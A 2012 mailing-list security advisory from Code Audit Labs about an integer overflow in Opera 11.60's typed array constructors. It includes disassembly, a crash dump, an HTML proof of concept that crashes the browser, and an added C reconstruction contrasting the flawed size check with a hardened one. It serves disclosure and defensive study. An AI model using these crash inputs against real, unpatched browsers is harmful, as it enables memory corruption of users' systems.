Message-ID: <4F29F6B9.2060906@gmail.com>
Date: Thu, 02 Feb 2012 10:36:41 +0800
From: Code Audit Labs <vulnhunt@...il.com>
To: cve@...re.org, full-disclosure@...ts.grok.org.uk,
  bugtraq@...urityfocus.com
Subject: [CAL-2012-0004] opera array integer overflow

CAL-2012-0004 opera array integer overflow


1 Affected Products
=================
Opera 11.60 and prior


2 Vulnerability Details
=====================

Code Audit Labs http://www.vulnhunt.com has discovered an integer 
overflow vulnerability in the typed array constructors (Int32Array, 
Int16Array, ...): a huge element count makes the allocation size 
arithmetic wrap to a small value while the subsequent fill uses the 
unwrapped length.

The Opera vendor says: "We have reproduced the problem, and determined that it 
does not have any security implications, since the crash is caused by 
a memory fill operation which the webpage has no control over, and this 
operation will always crash. It is therefore classified as a stability 
issue, not a security issue."


We still insist that whether it is a security issue or not should be decided 
according to the root cause of the bug, not according to whether it is 
exploitable. Because you think it is unexploitable, someone may still exploit 
it after deeper research.

So if most people in the security community think this is a security issue,
please assign a CVE number.


3 Analysis
=========
Take Int16Array(2147483647) as the example: the element count is x = 0x7FFFFFFF 
and the element size is 2. Memory corruption happens when all of the following 
conditions hold:
1: x*2 does not wrap below x, so the cmp/jb check that follows the imul passes 
   (for x = 0x7FFFFFFF, x*2 = 0xFFFFFFFE)
2: x*2 != 0, so the size-1 path (lea eax, [esi-1]) is taken instead of the 
   zero path
3: (x*2-1)+0x1f overflows 32 bits (0xFFFFFFFD + 0x1F wraps to 0x1C)

So the length passed to the allocator (sub_5C019DA0) is ((x*2-1)+0x1f) & ~7, 
which after the wrap is only 0x18 bytes, while memset(eax+0x10, 0, x*2) is 
then asked to zero x*2 = 0xFFFFFFFE bytes, running far past the end of the 
block. That out-of-bounds fill is the memory corruption.


.text:5C769F57
.text:5C769F57 loc_5C769F57:                           ; CODE XREF: sub_5C769DCE+17C.j
.text:5C769F57                 mov     eax, [esp+48h+var_20] ; var_20 is 2
.text:5C769F5B                 imul    eax, [esp+48h+var_3C] ; var_3C is 80000001
.text:5C769F60                 cmp     eax, [esp+48h+var_3C]
.text:5C769F64                 jb      short loc_5C769F37
.text:5C769F66                 mov     [esp+48h+size], eax
.text:5C769F6A                 mov     eax, [ebp+arg_0]
.text:5C769F6D                 call    sub_5C14A6E8
.text:5C769F72                 push    [esp+48h+size]  ; size
.text:5C769F76                 push    dword ptr [eax] ; int
.text:5C769F78                 push    [ebp+arg_0]     ; int
.text:5C769F7B                 call    sub_5C765B6D
.text:5C769F80                 add     esp, 0Ch

...

.text:5C46A598
.text:5C46A598 arg_0           = dword ptr  4
.text:5C46A598 size            = dword ptr  8
.text:5C46A598
.text:5C46A598                 mov     edx, [esp+arg_0]
.text:5C46A59C                 push    esi
.text:5C46A59D                 mov     esi, [esp+4+size]
.text:5C46A5A1                 test    esi, esi
.text:5C46A5A3                 jz      short loc_5C46A5AA
.text:5C46A5A5                 lea     eax, [esi-1]
.text:5C46A5A8                 jmp     short loc_5C46A5AC
.text:5C46A5AA ; ---------------------------------------------------------------------------
.text:5C46A5AA
.text:5C46A5AA loc_5C46A5AA:                           ; CODE XREF: sub_5C46A598+B.j
.text:5C46A5AA                 xor     eax, eax
.text:5C46A5AC
.text:5C46A5AC loc_5C46A5AC:                           ; CODE XREF: sub_5C46A598+10.j
.text:5C46A5AC                 mov     ecx, [edx+8]
.text:5C46A5AF                 add     eax, 1Fh
.text:5C46A5B2                 push    0
.text:5C46A5B4                 and     eax, 0FFFFFFF8h
.text:5C46A5B7                 push    eax
.text:5C46A5B8                 push    edx
.text:5C46A5B9                 call    sub_5C019DA0

...

.text:5C765BF7 loc_5C765BF7:                           ; CODE XREF: sub_5C765B6D+50.j
.text:5C765BF7                 push    [ebp+size]      ; size
.text:5C765BFA                 lea     eax, [ebx+10h]
.text:5C765BFD                 push    0               ; c
.text:5C765BFF                 push    eax             ; dst
.text:5C765C00                 call    memset
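The size arithmetic from the three listings above, reconstructed in C as an added example (this is not Opera's code; struct and function names such as alloc_plan, vulnerable_plan and hardened_plan are hypothetical). The vulnerable version mirrors the listing step by step: imul, the cmp/jb check, the (size-1)+0x1f rounding with "and eax, 0FFFFFFF8h", and the memset length. The hardened version evaluates the same formula in 64 bits and rejects any count whose intermediate would not fit the 32-bit size the allocator takes. One thing the arithmetic makes visible that the prose does not: the cmp/jb check only catches a wrapped product when the truncated result drops below the count, so Float64Array(1073741823) from the POC (8 * 0x3FFFFFFF truncated to 0xFFFFFFF8) passes it and still ends in a 0x10-byte allocation.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Hypothetical names: added example modelled on the disassembly, not Opera code. */
struct alloc_plan {
    bool     rejected;   /* the size check fired and nothing is allocated */
    uint32_t fill_len;   /* byte count later handed to memset()           */
    uint32_t alloc_len;  /* byte count handed to the allocator            */
};

/* Vulnerable path: imul/cmp/jb, then (size-1)+0x1f rounded down to a
 * multiple of 8, all in 32-bit arithmetic where the add can wrap. */
static struct alloc_plan vulnerable_plan(uint32_t count, uint32_t elem_size)
{
    struct alloc_plan p = { false, 0, 0 };
    uint32_t size = elem_size * count;            /* imul eax, count (wraps mod 2^32) */
    if (size < count) {                           /* cmp eax, count ; jb              */
        p.rejected = true;                        /* misses wraps that stay >= count  */
        return p;
    }
    uint32_t rounded = size != 0 ? size - 1 : 0;  /* test esi,esi ; jz ; lea eax,[esi-1] */
    rounded += 0x1f;                              /* add eax, 1Fh : unchecked, may wrap  */
    rounded &= 0xFFFFFFF8u;                       /* and eax, 0FFFFFFF8h                 */
    p.fill_len  = size;                           /* pushed as memset() size later       */
    p.alloc_len = rounded;                        /* pushed to the allocator             */
    return p;
}

/* Hardened version: same formula in 64 bits, rejected whenever the
 * product or the rounded total would not fit the 32-bit allocator size. */
static struct alloc_plan hardened_plan(uint32_t count, uint32_t elem_size)
{
    struct alloc_plan p = { false, 0, 0 };
    uint64_t size    = (uint64_t)elem_size * count;
    uint64_t rounded = ((size != 0 ? size - 1 : 0) + 0x1f) & ~(uint64_t)7;
    if (size > UINT32_MAX || rounded > UINT32_MAX) {
        p.rejected = true;
        return p;
    }
    p.fill_len  = (uint32_t)size;
    p.alloc_len = (uint32_t)rounded;
    return p;
}

/* Invariant the memset() must respect: it starts 0x10 bytes into the block
 * (lea eax, [ebx+10h]) and must end inside the bytes that were allocated. */
static bool fill_fits(struct alloc_plan p)
{
    return p.rejected || (uint64_t)p.fill_len + 0x10 <= p.alloc_len;
}

int main(void)
{
    /* Constructed inputs: the POC's constructors plus one sane count. */
    struct { const char *name; uint32_t count, elem; } cases[] = {
        { "Int16Array(2147483647)",   0x7FFFFFFFu, 2 },
        { "Int32Array(1073741823)",   0x3FFFFFFFu, 4 },
        { "Float64Array(1073741823)", 0x3FFFFFFFu, 8 },
        { "ArrayBuffer(4294967295)",  0xFFFFFFFFu, 1 },
        { "Int16Array(100)",          100u,        2 },
    };
    for (size_t i = 0; i < sizeof cases / sizeof cases[0]; i++) {
        struct alloc_plan v = vulnerable_plan(cases[i].count, cases[i].elem);
        struct alloc_plan h = hardened_plan(cases[i].count, cases[i].elem);
        printf("%-26s vulnerable: rejected=%d alloc=0x%08x fill=0x%08x fits=%d"
               " | hardened: rejected=%d\n",
               cases[i].name, (int)v.rejected, v.alloc_len, v.fill_len,
               (int)fill_fits(v), (int)h.rejected);
    }
    return 0;
}
```

For the Int16Array(2147483647) case the vulnerable plan allocates 0x18 bytes and then fills 0xFFFFFFFE of them; the hardened plan rejects the request because the rounded total exceeds UINT32_MAX, which is exactly the wrap the listing never checks for.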




4 Exploitable?
============
Who knows?


5 Crash info:
===============
(d10.ff4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=01fff21d ebx=00000000 ecx=0367ffb0 edx=00000076 esi=019c5ff8 edi=03610e68
eip=675b347e esp=02314de0 ebp=02314e24 iopl=0         nv up ei pl nz na pe cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010207
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Opera\Opera.dll -
Opera!OpGetNextUninstallFile+0x1961c:
675b347e 660f7f4150      movdqa  xmmword ptr [ecx+50h],xmm0 ds:0023:03680000=????????????????????????????????
0:000> .exr -1
ExceptionAddress: 675b347e (Opera!OpGetNextUninstallFile+0x0001961c)
    ExceptionCode: c0000005 (Access violation)
   ExceptionFlags: 00000000
NumberParameters: 2
    Parameter[0]: 00000001
    Parameter[1]: 03680000
Attempt to write to address 03680000
0:000> kp
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
02314e24 00000000 Opera!OpGetNextUninstallFile+0x1961c



6 POC:
====
Open an HTML file with the following content (the constructors are called 
without `new`, exactly as in the original test case):

<script>
// All of these crash Opera 11.60.
// 1073741823 = 0x3FFFFFFF, 2147483647 = 0x7FFFFFFF, 4294967295 = 0xFFFFFFFF:
// each count, multiplied by the element size, wraps or nearly fills 32 bits.
Int32Array(1073741823)
Float32Array(1073741823)
Float64Array(1073741823)
Int32Array(1073741823)
Uint32Array(1073741823)
Int16Array(2147483647)
ArrayBuffer(4294967295)
</script>




7 About Code Audit Labs:
=====================
Code Audit Labs secures your software, providing professional source code
audit and binary code audit services.
Code Audit Labs: "You create value for customers, we protect your value"
http://www.VulnHunt.com
